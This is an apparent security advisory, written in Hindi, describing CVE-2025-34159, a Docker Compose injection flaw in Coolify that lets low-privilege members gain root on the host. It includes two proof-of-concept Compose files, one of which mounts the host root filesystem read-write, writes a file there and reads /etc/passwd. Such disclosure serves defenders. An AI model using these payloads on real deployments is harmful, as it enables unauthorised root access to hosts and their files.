
Coolify के एप्लिकेशन परिनियोजन वर्कफ़्लो में एक महत्वपूर्ण रिमोट कोड निष्पादन (RCE) भेद्यता मौजूद है। यह दोष एक कम-विशेषाधिकार प्राप्त सदस्य को प्रोजेक्ट निर्माण या अपडेट के दौरान मनमाने ढंग से Docker Compose निर्देश इंजेक्ट करने की अनुमति देता है। एक दुर्भावनापूर्ण सेवा को परिभाषित करके जो होस्ट फ़ाइल सिस्टम को माउंट करती है, एक हमलावर रूट-स्तरीय कमांड निष्पादन प्राप्त कर सकता है
| फ़ील्ड | मान |
|---|---|
| CVE आईडी | CVE-2025-34159 |
| प्रभावित करता है | Coolify ≤ v4.0.0-beta.420.6 |
| में ठीक किया गया | v4.0.0-beta.420.7 |
| गंभीरता | गंभीर |
| CVSS 4.0 | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| CWE | CWE-78 (OS कमांड इंजेक्शन), CWE-20 (अनुचित इनपुट सत्यापन) |
Coolify के एप्लिकेशन डिप्लॉयमेंट वर्कफ़्लो में एक गंभीर रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता मौजूद है। यह दोष एक कम-विशेषाधिकार वाले सदस्य को प्रोजेक्ट निर्माण या अपडेट के दौरान मनमाने Docker Compose निर्देश इंजेक्ट करने की अनुमति देता है। एक दुर्भावनापूर्ण सेवा को परिभाषित करके जो होस्ट फ़ाइलसिस्टम को माउंट करती है, एक हमलावर कंटेनर आइसोलेशन को पूरी तरह से बायपास करते हुए होस्ट OS पर रूट-स्तरीय कमांड निष्पादन प्राप्त कर सकता है।
यह भेद्यता प्रोजेक्ट डिप्लॉयमेंट वर्कफ़्लो में मौजूद है जहां उपयोगकर्ता द्वारा प्रदान की गई Docker Compose कॉन्फ़िगरेशन को पर्याप्त सत्यापन या सैंडबॉक्सिंग के बिना संसाधित किया जाता है।
version: '3.8'
services:
poc-host-root:
image: alpine:3.19
tty: true
volumes:
- /:/host:rw
command: >
sh -c "
echo '[*] Proof of RCE on host' &&
echo 'RCE by Eyodav' > /host/tmp/proof_rce.txt &&
whoami &&
id &&
uname -a &&
head -n 5 /host/etc/passwd
"
परिणाम: डिप्लॉयमेंट के बाद, /tmp/proof_rce.txt होस्ट सिस्टम पर दिखाई देता है, जो रूट विशेषाधिकारों के साथ RCE की पुष्टि करता है।
version: '3.8'
services:
poc-host-write:
image: alpine:3.19
tty: true
volumes:
- /home/eyodav/PoC:/host
command: >
sh -c "
set -e;
mkdir -p /host &&
echo '[*] Writing PoC file to host mount...' &&
echo RCE_PoC_from_container_$(date) > /host/RCE_PoC.txt &&
cd /host &&
pwd &&
ls -la
"
/tmp/proof_rce.txt) की जाँच करके या डिप्लॉयमेंट लॉग में कमांड आउटपुट की समीक्षा करके शोषण सत्यापित करें